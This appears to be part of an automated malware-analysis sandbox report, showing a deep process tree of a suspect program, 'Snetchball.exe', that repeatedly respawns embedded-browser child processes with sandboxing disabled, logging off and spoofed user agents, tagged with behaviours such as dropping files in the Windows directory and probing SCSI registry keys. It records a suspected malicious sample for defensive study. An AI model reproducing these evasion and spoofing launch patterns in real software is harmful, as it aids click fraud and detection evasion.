        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3092 --field-trial-handle=2896,i,17033510643438936341,2359972791489705363,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        18⤵
        
        PID:5340
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3612 --field-trial-handle=2896,i,17033510643438936341,2359972791489705363,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        18⤵
        
        PID:3352
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        19⤵
        Modifies Control Panel
        
        PID:4212
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        20⤵
        Drops file in Windows directory
        Modifies Control Panel
        
        PID:8120
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2828 --field-trial-handle=2840,i,16138836492212212970,6335343807123212309,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        21⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3348 --field-trial-handle=2840,i,16138836492212212970,6335343807123212309,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        21⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3384 --field-trial-handle=2840,i,16138836492212212970,6335343807123212309,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        21⤵
        
        PID:5868
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3408 --field-trial-handle=2840,i,16138836492212212970,6335343807123212309,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        21⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        22⤵
        Modifies Control Panel
        
        PID:6376
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        23⤵
        Drops file in Windows directory
        Modifies Control Panel
        
        PID:7580
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2800 --field-trial-handle=2804,i,17018045236291771147,12744343387756172081,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        24⤵
        
        PID:7620
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3056 --field-trial-handle=2804,i,17018045236291771147,12744343387756172081,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        24⤵
        
        PID:7496
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3468 --field-trial-handle=2804,i,17018045236291771147,12744343387756172081,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        24⤵
        
        PID:1936
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3500 --field-trial-handle=2804,i,17018045236291771147,12744343387756172081,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        24⤵
        
        PID:5348
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3512 --field-trial-handle=2804,i,17018045236291771147,12744343387756172081,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        24⤵
        
        PID:6292
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        25⤵
        Modifies Control Panel
        
        PID:5276
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        26⤵
        Drops file in Windows directory
        Modifies Control Panel
        
        PID:5236
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2852 --field-trial-handle=2856,i,280347972694214054,15786151154430149163,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        27⤵
        
        PID:1040
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3112 --field-trial-handle=2856,i,280347972694214054,15786151154430149163,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        27⤵
        
        PID:7968
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3632 --field-trial-handle=2856,i,280347972694214054,15786151154430149163,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        27⤵
        
        PID:7324
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3640 --field-trial-handle=2856,i,280347972694214054,15786151154430149163,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        27⤵
        
        PID:5776
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        28⤵
        Modifies Control Panel
        
        PID:3920
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        29⤵
        Drops file in Windows directory
        Modifies Control Panel
        
        PID:236
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2800 --field-trial-handle=2804,i,1421291830089692137,2727942343725945860,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        30⤵
        
        PID:2504
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3068 --field-trial-handle=2804,i,1421291830089692137,2727942343725945860,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        30⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3640 --field-trial-handle=2804,i,1421291830089692137,2727942343725945860,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        30⤵
        
        PID:7216
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3672 --field-trial-handle=2804,i,1421291830089692137,2727942343725945860,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        30⤵
        
        PID:5912
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        31⤵
        Modifies Control Panel
        
        PID:8012
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        32⤵
        Drops file in Windows directory
        Modifies Control Panel
        
        PID:6216
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2832 --field-trial-handle=2828,i,9931231403639750034,11152626130478854906,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        33⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3020 --field-trial-handle=2828,i,9931231403639750034,11152626130478854906,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        33⤵
        
        PID:6460
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3444 --field-trial-handle=2828,i,9931231403639750034,11152626130478854906,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        33⤵
        
        PID:7140
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3664 --field-trial-handle=2828,i,9931231403639750034,11152626130478854906,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        33⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        34⤵
        Modifies Control Panel
        
        PID:3988
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        35⤵
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Modifies Control Panel
        
        PID:6988
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2804 --field-trial-handle=2816,i,6835565147080286429,15134625588813713346,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        36⤵
        
        PID:4624
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3096 --field-trial-handle=2816,i,6835565147080286429,15134625588813713346,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        36⤵
        
        PID:924
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3624 --field-trial-handle=2816,i,6835565147080286429,15134625588813713346,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        36⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3656 --field-trial-handle=2816,i,6835565147080286429,15134625588813713346,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        36⤵
        
        PID:5144
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        37⤵
        
        PID:7460
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        38⤵
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Modifies Control Panel
        
        PID:7532
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2808 --field-trial-handle=2812,i,8163050573244031866,10380674915939296453,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        39⤵
        
        PID:7268
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3100 --field-trial-handle=2812,i,8163050573244031866,10380674915939296453,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        39⤵
        
        PID:3336
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3616 --field-trial-handle=2812,i,8163050573244031866,10380674915939296453,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        39⤵
        
        PID:8000
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
